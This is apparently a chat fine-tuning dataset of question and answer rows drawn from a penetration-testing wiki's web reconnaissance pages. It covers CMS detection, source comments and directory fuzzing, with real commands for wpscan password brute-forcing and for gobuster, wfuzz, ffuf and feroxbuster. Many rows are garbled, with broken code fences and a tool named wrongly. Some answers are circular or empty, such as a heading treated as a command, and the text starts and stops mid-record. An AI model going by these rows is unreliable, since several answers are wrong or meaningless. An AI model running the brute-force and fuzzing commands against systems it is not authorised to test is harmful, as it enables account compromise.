(CMS) - Practice"}, {"role": "assistant", "content": "The use of a CMS on a web application is usually quite easy to spot with visual elements:\n\n* Credits at the bottom or corner of pages\n* HTTP headers\n* Common files (e.g. robots.txt, sitemap.xml)\n* Comments and metadata (HTML, CSS, JavaScript)\n* Stack traces and verbose error messages\n\nAutomated scanning tools can also help identify which technologies are used, and if known vulnerabilities may be present. Tools vary depending on the CMS technology to audit.\n\n* WPScan (Ruby) can be used for sites that use WordPress\n* droopescan (Python) supports Drupal, SilverStripe and WordPress and partially supports Joomla and Moodle.\n* Wappalyzer is a browser extension that can detect the use of certain software including CMS\n* Whatcms.org can help answering the question \"What CMS is this site using?\" but needs the target website to be accessible from the Internet.\n\n::: tabs\n\n=== WPScan\n\nFor web applications built with WordPress, WPScan (Ruby) can be used to enumerate information and potential vulnerabilities. Appart from bruteforce and enumeration operations, WPScan doesn't implement exploits.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Content Management System (CMS) - Practice", "response": "The use of a CMS on a web application is usually quite easy to spot with visual elements:\n\n* Credits at the bottom or corner of pages\n* HTTP headers\n* Common files (e.g. robots.txt, sitemap.xml)\n* Comments and metadata (HTML, CSS, JavaScript)\n* Stack traces and verbose error messages\n\nAutomated scanning tools can also help identify which technologies are used, and if known vulnerabilities may be present. Tools vary depending on the CMS technology to audit.\n\n* WPScan (Ruby) can be used for sites that use WordPress\n* droopescan (Python) supports Drupal, SilverStripe and WordPress and partially supports Joomla and Moodle.\n* Wappalyzer is a browser extension that can detect the use of certain software including CMS\n* Whatcms.org can help answering the question \"What CMS is this site using?\" but needs the target website to be accessible from the Internet.\n\n::: tabs\n\n=== WPScan\n\nFor web applications built with WordPress, WPScan (Ruby) can be used to enumerate information and potential vulnerabilities. Appart from bruteforce and enumeration operations, WPScan doesn't implement exploits.\n\n```bash", "metadata": {"corpus_index": 1959, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Content Management System (CMS) - Practice"}, {"role": "assistant", "content": "The use of a CMS on a web application is usually quite easy to spot with visual elements:\n\n* Credits at the bottom or corner of pages\n* HTTP headers\n* Common files (e.g. robots.txt, sitemap.xml)\n* Comments and metadata (HTML, CSS, JavaScript)\n* Stack traces and verbose error messages\n\nAutomated scanning tools can also help identify which technologies are used, and if known vulnerabilities may be present. Tools vary depending on the CMS technology to audit.\n\n* WPScan (Ruby) can be used for sites that use WordPress\n* droopescan (Python) supports Drupal, SilverStripe and WordPress and partially supports Joomla and Moodle.\n* Wappalyzer is a browser extension that can detect the use of certain software including CMS\n* Whatcms.org can help answering the question \"What CMS is this site using?\" but needs the target website to be accessible from the Internet.\n\n::: tabs\n\n=== WPScan\n\nFor web applications built with WordPress, WPScan (Ruby) can be used to enumerate information and potential vulnerabilities. Appart from bruteforce and enumeration operations, WPScan doesn't implement exploits.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Content Management System (CMS) - Practice", "response": "The use of a CMS on a web application is usually quite easy to spot with visual elements:\n\n* Credits at the bottom or corner of pages\n* HTTP headers\n* Common files (e.g. robots.txt, sitemap.xml)\n* Comments and metadata (HTML, CSS, JavaScript)\n* Stack traces and verbose error messages\n\nAutomated scanning tools can also help identify which technologies are used, and if known vulnerabilities may be present. Tools vary depending on the CMS technology to audit.\n\n* WPScan (Ruby) can be used for sites that use WordPress\n* droopescan (Python) supports Drupal, SilverStripe and WordPress and partially supports Joomla and Moodle.\n* Wappalyzer is a browser extension that can detect the use of certain software including CMS\n* Whatcms.org can help answering the question \"What CMS is this site using?\" but needs the target website to be accessible from the Internet.\n\n::: tabs\n\n=== WPScan\n\nFor web applications built with WordPress, WPScan (Ruby) can be used to enumerate information and potential vulnerabilities. Appart from bruteforce and enumeration operations, WPScan doesn't implement exploits.\n\n```bash", "metadata": {"corpus_index": 1959, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe bruteforce a user in the context of penetration testing"}, {"role": "assistant", "content": "wpscan --url $URL --username $username --passwords \"/path/to/wordlist.txt\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe bruteforce a user in the context of penetration testing", "response": "wpscan --url $URL --username $username --passwords \"/path/to/wordlist.txt\"", "metadata": {"corpus_index": 1960, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out bruteforce a user during a pentest?"}, {"role": "assistant", "content": "wpscan --url $URL --username $username --passwords \"/path/to/wordlist.txt\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out bruteforce a user during a pentest?", "response": "wpscan --url $URL --username $username --passwords \"/path/to/wordlist.txt\"", "metadata": {"corpus_index": 1960, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of enumerate and bruteforce users"}, {"role": "assistant", "content": "wpscan --url $URL --enumerate u --passwords \"/path/to/wordlist.txt\"\n``\n\n=== droopescan\n\nFor web applications built with Drupal, SilverStripe, WordPress, Joomla or Moodle, droopescan (Python) can be used to enumerate information and potential vulnerabilities. Apart from bruteforce and enumeration operations, WPScan doesn't implement exploits.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of enumerate and bruteforce users", "response": "wpscan --url $URL --enumerate u --passwords \"/path/to/wordlist.txt\"\n``\n\n=== droopescan\n\nFor web applications built with Drupal, SilverStripe, WordPress, Joomla or Moodle, droopescan (Python) can be used to enumerate information and potential vulnerabilities. Apart from bruteforce and enumeration operations, WPScan doesn't implement exploits.\n\n``bash", "metadata": {"corpus_index": 1961, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for enumerate and bruteforce users"}, {"role": "assistant", "content": "wpscan --url $URL --enumerate u --passwords \"/path/to/wordlist.txt\"\n``\n\n=== droopescan\n\nFor web applications built with Drupal, SilverStripe, WordPress, Joomla or Moodle, droopescan (Python) can be used to enumerate information and potential vulnerabilities. Apart from bruteforce and enumeration operations, WPScan doesn't implement exploits.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for enumerate and bruteforce users", "response": "wpscan --url $URL --enumerate u --passwords \"/path/to/wordlist.txt\"\n``\n\n=== droopescan\n\nFor web applications built with Drupal, SilverStripe, WordPress, Joomla or Moodle, droopescan (Python) can be used to enumerate information and potential vulnerabilities. Apart from bruteforce and enumeration operations, WPScan doesn't implement exploits.\n\n``bash", "metadata": {"corpus_index": 1961, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform enumerate and bruteforce users?"}, {"role": "assistant", "content": "=== droopescan\n\nFor web applications built with Drupal, SilverStripe, WordPress, Joomla or Moodle, [droopescan](https://github.com/SamJoan/droopescan) (Python) can be used to enumerate information and potential vulnerabilities. Apart from bruteforce and enumeration operations, WPScan doesn't implement exploits."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform enumerate and bruteforce users?", "response": "=== droopescan\n\nFor web applications built with Drupal, SilverStripe, WordPress, Joomla or Moodle, [droopescan](https://github.com/SamJoan/droopescan) (Python) can be used to enumerate information and potential vulnerabilities. Apart from bruteforce and enumeration operations, WPScan doesn't implement exploits.", "metadata": {"corpus_index": 1962, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== droopescan`?"}, {"role": "assistant", "content": "This command is used for enumerate and bruteforce users. enumerate and bruteforce users"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== droopescan`?", "response": "This command is used for enumerate and bruteforce users. enumerate and bruteforce users", "metadata": {"corpus_index": 1962, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Comments and metadata - Theory?"}, {"role": "assistant", "content": "When requesting a web application, the server usually sends code (in HTML, CSS, Javascript...) in the response. This code is then rendered by the web browser. Web developers sometimes forget that this code is not protected, hence leaving sensitive comments in it.\n\nMetadata can sometimes indicate the use of a Content Management Systems (CMS) like WordPress or Drupal and help identify the technologies and CMS used."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Comments and metadata - Theory?", "response": "When requesting a web application, the server usually sends code (in HTML, CSS, Javascript...) in the response. This code is then rendered by the web browser. Web developers sometimes forget that this code is not protected, hence leaving sensitive comments in it.\n\nMetadata can sometimes indicate the use of a Content Management Systems (CMS) like WordPress or Drupal and help identify the technologies and CMS used.", "metadata": {"corpus_index": 1963, "category": "web", "source_file": "docs/src/web/recon/comments-and-metadata.md", "page_title": "Comments and metadata", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Comments and metadata - Theory?"}, {"role": "assistant", "content": "When requesting a web application, the server usually sends code (in HTML, CSS, Javascript...) in the response. This code is then rendered by the web browser. Web developers sometimes forget that this code is not protected, hence leaving sensitive comments in it.\n\nMetadata can sometimes indicate the use of a Content Management Systems (CMS) like WordPress or Drupal and help identify the technologies and CMS used."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Comments and metadata - Theory?", "response": "When requesting a web application, the server usually sends code (in HTML, CSS, Javascript...) in the response. This code is then rendered by the web browser. Web developers sometimes forget that this code is not protected, hence leaving sensitive comments in it.\n\nMetadata can sometimes indicate the use of a Content Management Systems (CMS) like WordPress or Drupal and help identify the technologies and CMS used.", "metadata": {"corpus_index": 1963, "category": "web", "source_file": "docs/src/web/recon/comments-and-metadata.md", "page_title": "Comments and metadata", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Comments and metadata - Practice?"}, {"role": "assistant", "content": "Looking for comments and metadata can be done manually (looking at the source codes) or with tools like Burp Suite (Dashboard > New scan (Crawl) then Target > right click > Engagement tools > Find comments )."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Comments and metadata - Practice?", "response": "Looking for comments and metadata can be done manually (looking at the source codes) or with tools like Burp Suite (Dashboard > New scan (Crawl) then Target > right click > Engagement tools > Find comments ).", "metadata": {"corpus_index": 1964, "category": "web", "source_file": "docs/src/web/recon/comments-and-metadata.md", "page_title": "Comments and metadata", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Comments and metadata - Practice"}, {"role": "assistant", "content": "Looking for comments and metadata can be done manually (looking at the source codes) or with tools like Burp Suite (Dashboard > New scan (Crawl) then Target > right click > Engagement tools > Find comments )."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Comments and metadata - Practice", "response": "Looking for comments and metadata can be done manually (looking at the source codes) or with tools like Burp Suite (Dashboard > New scan (Crawl) then Target > right click > Engagement tools > Find comments ).", "metadata": {"corpus_index": 1964, "category": "web", "source_file": "docs/src/web/recon/comments-and-metadata.md", "page_title": "Comments and metadata", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Directory fuzzing - Theory in the context of penetration testing"}, {"role": "assistant", "content": "While Crawling allows testers to build the indexed architecture of website, this technique can't find directories and files that are not referenced. Directory fuzzing (a.k.a. directory bruteforcing) is a technique that can find some of those \"hidden\" paths. Dictionaries of common paths are used to request the web app for each path until exhaustion of the list. This technique relies on the attacker using a dictionnary/wordlist. A request is made for every line of the wordlist to differentiate pages that exist and pages that don't"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Directory fuzzing - Theory in the context of penetration testing", "response": "While Crawling allows testers to build the indexed architecture of website, this technique can't find directories and files that are not referenced. Directory fuzzing (a.k.a. directory bruteforcing) is a technique that can find some of those \"hidden\" paths. Dictionaries of common paths are used to request the web app for each path until exhaustion of the list. This technique relies on the attacker using a dictionnary/wordlist. A request is made for every line of the wordlist to differentiate pages that exist and pages that don't", "metadata": {"corpus_index": 1965, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Directory fuzzing - Theory"}, {"role": "assistant", "content": "While Crawling allows testers to build the indexed architecture of website, this technique can't find directories and files that are not referenced. Directory fuzzing (a.k.a. directory bruteforcing) is a technique that can find some of those \"hidden\" paths. Dictionaries of common paths are used to request the web app for each path until exhaustion of the list. This technique relies on the attacker using a dictionnary/wordlist. A request is made for every line of the wordlist to differentiate pages that exist and pages that don't"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Directory fuzzing - Theory", "response": "While Crawling allows testers to build the indexed architecture of website, this technique can't find directories and files that are not referenced. Directory fuzzing (a.k.a. directory bruteforcing) is a technique that can find some of those \"hidden\" paths. Dictionaries of common paths are used to request the web app for each path until exhaustion of the list. This technique relies on the attacker using a dictionnary/wordlist. A request is made for every line of the wordlist to differentiate pages that exist and pages that don't", "metadata": {"corpus_index": 1965, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Directory fuzzing - Fuzzing tools"}, {"role": "assistant", "content": "Tools like dirb (C), dirbuster (Java), gobuster (Go), wfuzz (Python), ffuf (Go) and feroxbuster (Rust) can do directory fuzzing/bruteforcing. Burp Suite can do it too. Depending on the web application, one will be better suited than another and additional options will be needed.\n\n``bash\ngobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL\n`\n\n`bash\nwfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ\n`\n\nffuf (Go) and feroxbuster (Rust) are two awesome alternatives that can do recursive fuzzing unlike gobuster (Go) and wfuzz (Python) mentioned above.\n\n`bash\nffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ\n`\n\n`bash\nferoxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/\n``\n\n> [!CAUTION]\n> Directory fuzzing needs to be slowed down when testing production instances as it could lead to an unintended denial of service, especially when using feroxbuster, a tool known for it's high speed."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Directory fuzzing - Fuzzing tools", "response": "Tools like dirb (C), dirbuster (Java), gobuster (Go), wfuzz (Python), ffuf (Go) and feroxbuster (Rust) can do directory fuzzing/bruteforcing. Burp Suite can do it too. Depending on the web application, one will be better suited than another and additional options will be needed.\n\n``bash\ngobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL\n`\n\n`bash\nwfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ\n`\n\nffuf (Go) and feroxbuster (Rust) are two awesome alternatives that can do recursive fuzzing unlike gobuster (Go) and wfuzz (Python) mentioned above.\n\n`bash\nffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ\n`\n\n`bash\nferoxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/\n``\n\n> [!CAUTION]\n> Directory fuzzing needs to be slowed down when testing production instances as it could lead to an unintended denial of service, especially when using feroxbuster, a tool known for it's high speed.", "metadata": {"corpus_index": 1966, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Directory fuzzing - Fuzzing tools?"}, {"role": "assistant", "content": "Tools like dirb (C), dirbuster (Java), gobuster (Go), wfuzz (Python), ffuf (Go) and feroxbuster (Rust) can do directory fuzzing/bruteforcing. Burp Suite can do it too. Depending on the web application, one will be better suited than another and additional options will be needed.\n\n``bash\ngobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL\n`\n\n`bash\nwfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ\n`\n\nffuf (Go) and feroxbuster (Rust) are two awesome alternatives that can do recursive fuzzing unlike gobuster (Go) and wfuzz (Python) mentioned above.\n\n`bash\nffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ\n`\n\n`bash\nferoxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/\n``\n\n> [!CAUTION]\n> Directory fuzzing needs to be slowed down when testing production instances as it could lead to an unintended denial of service, especially when using feroxbuster, a tool known for it's high speed."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Directory fuzzing - Fuzzing tools?", "response": "Tools like dirb (C), dirbuster (Java), gobuster (Go), wfuzz (Python), ffuf (Go) and feroxbuster (Rust) can do directory fuzzing/bruteforcing. Burp Suite can do it too. Depending on the web application, one will be better suited than another and additional options will be needed.\n\n``bash\ngobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL\n`\n\n`bash\nwfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ\n`\n\nffuf (Go) and feroxbuster (Rust) are two awesome alternatives that can do recursive fuzzing unlike gobuster (Go) and wfuzz (Python) mentioned above.\n\n`bash\nffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ\n`\n\n`bash\nferoxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/\n``\n\n> [!CAUTION]\n> Directory fuzzing needs to be slowed down when testing production instances as it could lead to an unintended denial of service, especially when using feroxbuster, a tool known for it's high speed.", "metadata": {"corpus_index": 1966, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the gobuster command for directory fuzzing - fuzzing tools"}, {"role": "assistant", "content": "gobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the gobuster command for directory fuzzing - fuzzing tools", "response": "gobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL", "metadata": {"corpus_index": 1967, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "gobuster"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Directory fuzzing - Fuzzing tools?"}, {"role": "assistant", "content": "gobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Directory fuzzing - Fuzzing tools?", "response": "gobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL", "metadata": {"corpus_index": 1967, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `gobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL`?"}, {"role": "assistant", "content": "This command is used for directory fuzzing - fuzzing tools. Fuzzing tools"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `gobuster dir --useragent \"PENTEST\" --wordlist \"/path/to/wordlist.txt\" --url $URL`?", "response": "This command is used for directory fuzzing - fuzzing tools. Fuzzing tools", "metadata": {"corpus_index": 1967, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the wfuzz command for directory fuzzing - fuzzing tools"}, {"role": "assistant", "content": "wfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the wfuzz command for directory fuzzing - fuzzing tools", "response": "wfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ", "metadata": {"corpus_index": 1968, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "wfuzz"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Directory fuzzing - Fuzzing tools?"}, {"role": "assistant", "content": "wfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Directory fuzzing - Fuzzing tools?", "response": "wfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ", "metadata": {"corpus_index": 1968, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `wfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ`?"}, {"role": "assistant", "content": "This command is used for directory fuzzing - fuzzing tools. Fuzzing tools"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `wfuzz --hc 404,403 -H \"User-Agent: PENTEST\" -c -z file,\"/path/to/wordlist.txt\" $URL/FUZZ`?", "response": "This command is used for directory fuzzing - fuzzing tools. Fuzzing tools", "metadata": {"corpus_index": 1968, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the ffuf command for directory fuzzing - fuzzing tools"}, {"role": "assistant", "content": "ffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the ffuf command for directory fuzzing - fuzzing tools", "response": "ffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ", "metadata": {"corpus_index": 1969, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ffuf"}} {"messages": [{"role": "system", "content": "You are a penetration 